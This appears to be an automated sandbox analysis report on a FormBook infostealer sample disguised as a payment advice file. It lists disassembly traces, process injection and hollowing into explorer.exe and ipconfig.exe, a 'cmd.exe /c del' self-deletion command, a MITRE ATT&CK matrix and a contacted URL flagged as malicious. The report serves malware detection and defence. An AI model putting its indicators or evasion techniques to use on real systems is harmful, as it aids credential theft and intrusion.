Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605210 mov eax, dword ptr fs:[00000030h]	19_2_03605210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605210 mov eax, dword ptr fs:[00000030h]	19_2_03605210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360AA16 mov eax, dword ptr fs:[00000030h]	19_2_0360AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360AA16 mov eax, dword ptr fs:[00000030h]	19_2_0360AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CAA16 mov eax, dword ptr fs:[00000030h]	19_2_036CAA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CAA16 mov eax, dword ptr fs:[00000030h]	19_2_036CAA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03623A1C mov eax, dword ptr fs:[00000030h]	19_2_03623A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF mov eax, dword ptr fs:[00000030h]	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03632AE4 mov eax, dword ptr fs:[00000030h]	19_2_03632AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605AC0 mov eax, dword ptr fs:[00000030h]	19_2_03605AC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605AC0 mov eax, dword ptr fs:[00000030h]	19_2_03605AC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605AC0 mov eax, dword ptr fs:[00000030h]	19_2_03605AC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03632ACB mov eax, dword ptr fs:[00000030h]	19_2_03632ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03603ACA mov eax, dword ptr fs:[00000030h]	19_2_03603ACA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D8ADD mov eax, dword ptr fs:[00000030h]	19_2_036D8ADD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036012D4 mov eax, dword ptr fs:[00000030h]	19_2_036012D4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03601AA0 mov eax, dword ptr fs:[00000030h]	19_2_03601AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03635AA0 mov eax, dword ptr fs:[00000030h]	19_2_03635AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03635AA0 mov eax, dword ptr fs:[00000030h]	19_2_03635AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036052A5 mov eax, dword ptr fs:[00000030h]	19_2_036052A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036052A5 mov eax, dword ptr fs:[00000030h]	19_2_036052A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036052A5 mov eax, dword ptr fs:[00000030h]	19_2_036052A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036052A5 mov eax, dword ptr fs:[00000030h]	19_2_036052A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036052A5 mov eax, dword ptr fs:[00000030h]	19_2_036052A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361AAB0 mov eax, dword ptr fs:[00000030h]	19_2_0361AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361AAB0 mov eax, dword ptr fs:[00000030h]	19_2_0361AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363FAB0 mov eax, dword ptr fs:[00000030h]	19_2_0363FAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036312BD mov esi, dword ptr fs:[00000030h]	19_2_036312BD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036312BD mov eax, dword ptr fs:[00000030h]	19_2_036312BD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036312BD mov eax, dword ptr fs:[00000030h]	19_2_036312BD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C129A mov eax, dword ptr fs:[00000030h]	19_2_036C129A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363D294 mov eax, dword ptr fs:[00000030h]	19_2_0363D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363D294 mov eax, dword ptr fs:[00000030h]	19_2_0363D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360C962 mov eax, dword ptr fs:[00000030h]	19_2_0360C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D8966 mov eax, dword ptr fs:[00000030h]	19_2_036D8966
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CE962 mov eax, dword ptr fs:[00000030h]	19_2_036CE962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360B171 mov eax, dword ptr fs:[00000030h]	19_2_0360B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360B171 mov eax, dword ptr fs:[00000030h]	19_2_0360B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B944 mov eax, dword ptr fs:[00000030h]	19_2_0362B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B944 mov eax, dword ptr fs:[00000030h]	19_2_0362B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1951 mov eax, dword ptr fs:[00000030h]	19_2_036C1951
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360395E mov eax, dword ptr fs:[00000030h]	19_2_0360395E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360395E mov eax, dword ptr fs:[00000030h]	19_2_0360395E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120 mov eax, dword ptr fs:[00000030h]	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120 mov eax, dword ptr fs:[00000030h]	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120 mov eax, dword ptr fs:[00000030h]	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120 mov eax, dword ptr fs:[00000030h]	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120 mov ecx, dword ptr fs:[00000030h]	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03603138 mov ecx, dword ptr fs:[00000030h]	19_2_03603138
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363513A mov eax, dword ptr fs:[00000030h]	19_2_0363513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363513A mov eax, dword ptr fs:[00000030h]	19_2_0363513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609100 mov eax, dword ptr fs:[00000030h]	19_2_03609100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609100 mov eax, dword ptr fs:[00000030h]	19_2_03609100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609100 mov eax, dword ptr fs:[00000030h]	19_2_03609100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036031E0 mov eax, dword ptr fs:[00000030h]	19_2_036031E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036941E8 mov eax, dword ptr fs:[00000030h]	19_2_036941E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360B1E1 mov eax, dword ptr fs:[00000030h]	19_2_0360B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360B1E1 mov eax, dword ptr fs:[00000030h]	19_2_0360B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360B1E1 mov eax, dword ptr fs:[00000030h]	19_2_0360B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D89E7 mov eax, dword ptr fs:[00000030h]	19_2_036D89E7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C19D8 mov eax, dword ptr fs:[00000030h]	19_2_036C19D8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036361A0 mov eax, dword ptr fs:[00000030h]	19_2_036361A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036361A0 mov eax, dword ptr fs:[00000030h]	19_2_036361A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C49A4 mov eax, dword ptr fs:[00000030h]	19_2_036C49A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C49A4 mov eax, dword ptr fs:[00000030h]	19_2_036C49A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C49A4 mov eax, dword ptr fs:[00000030h]	19_2_036C49A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C49A4 mov eax, dword ptr fs:[00000030h]	19_2_036C49A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036869A6 mov eax, dword ptr fs:[00000030h]	19_2_036869A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036851BE mov eax, dword ptr fs:[00000030h]	19_2_036851BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036851BE mov eax, dword ptr fs:[00000030h]	19_2_036851BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036851BE mov eax, dword ptr fs:[00000030h]	19_2_036851BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036851BE mov eax, dword ptr fs:[00000030h]	19_2_036851BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov eax, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov eax, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov eax, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov ecx, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF mov eax, dword ptr fs:[00000030h]	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362C182 mov eax, dword ptr fs:[00000030h]	19_2_0362C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CA189 mov eax, dword ptr fs:[00000030h]	19_2_036CA189
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CA189 mov ecx, dword ptr fs:[00000030h]	19_2_036CA189
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363A185 mov eax, dword ptr fs:[00000030h]	19_2_0363A185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03632990 mov eax, dword ptr fs:[00000030h]	19_2_03632990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03634190 mov eax, dword ptr fs:[00000030h]	19_2_03634190
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360519E mov eax, dword ptr fs:[00000030h]	19_2_0360519E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360519E mov ecx, dword ptr fs:[00000030h]	19_2_0360519E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362F86D mov eax, dword ptr fs:[00000030h]	19_2_0362F86D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D1074 mov eax, dword ptr fs:[00000030h]	19_2_036D1074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C2073 mov eax, dword ptr fs:[00000030h]	19_2_036C2073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1843 mov eax, dword ptr fs:[00000030h]	19_2_036C1843
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605050 mov eax, dword ptr fs:[00000030h]	19_2_03605050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605050 mov eax, dword ptr fs:[00000030h]	19_2_03605050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605050 mov eax, dword ptr fs:[00000030h]	19_2_03605050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03620050 mov eax, dword ptr fs:[00000030h]	19_2_03620050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03620050 mov eax, dword ptr fs:[00000030h]	19_2_03620050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03607057 mov eax, dword ptr fs:[00000030h]	19_2_03607057
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03634020 mov edi, dword ptr fs:[00000030h]	19_2_03634020
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361B02A mov eax, dword ptr fs:[00000030h]	19_2_0361B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361B02A mov eax, dword ptr fs:[00000030h]	19_2_0361B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361B02A mov eax, dword ptr fs:[00000030h]	19_2_0361B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361B02A mov eax, dword ptr fs:[00000030h]	19_2_0361B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363002D mov eax, dword ptr fs:[00000030h]	19_2_0363002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363002D mov eax, dword ptr fs:[00000030h]	19_2_0363002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363002D mov eax, dword ptr fs:[00000030h]	19_2_0363002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363002D mov eax, dword ptr fs:[00000030h]	19_2_0363002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363002D mov eax, dword ptr fs:[00000030h]	19_2_0363002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A830 mov eax, dword ptr fs:[00000030h]	19_2_0362A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A830 mov eax, dword ptr fs:[00000030h]	19_2_0362A830

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Thread register set: target process: 3388

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 9F0000

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\payment advice_mt103645367.exe'

Jump to behavior

Source: explorer.exe, 00000010.00000000.452065592.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000010.00000000.452314813.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000010.00000000.452314813.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.452314813.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.452314813.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Code function: 10_2_00567064 cpuid

10_2_00567064

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: payment advice_mt103645367.exe PID: 2440, type: MEMORY
Source: Yara match	File source: Process Memory Space: ipconfig.exe PID: 244, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection412	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery621	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection412	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery311	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
payment advice_mt103645367.exe	30%	Virustotal		Browse
payment advice_mt103645367.exe	19%	ReversingLabs	Win32.Packed.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
19.2.ipconfig.exe.3b17960.4.unpack	100%	Avira	TR/Dropper.Gen		Download File
19.2.ipconfig.exe.31b0840.1.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://crl.mY	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
www.healthpro.info/hwad/	1%	Virustotal		Browse
www.healthpro.info/hwad/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
googlehosted.l.googleusercontent.com	216.58.214.225	true	false		high
doc-0g-3k-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.healthpro.info/hwad/	true	1%, Virustotal, Browse Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://crl.mY	explorer.exe, 00000010.00000000.474142184.000000000F54C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
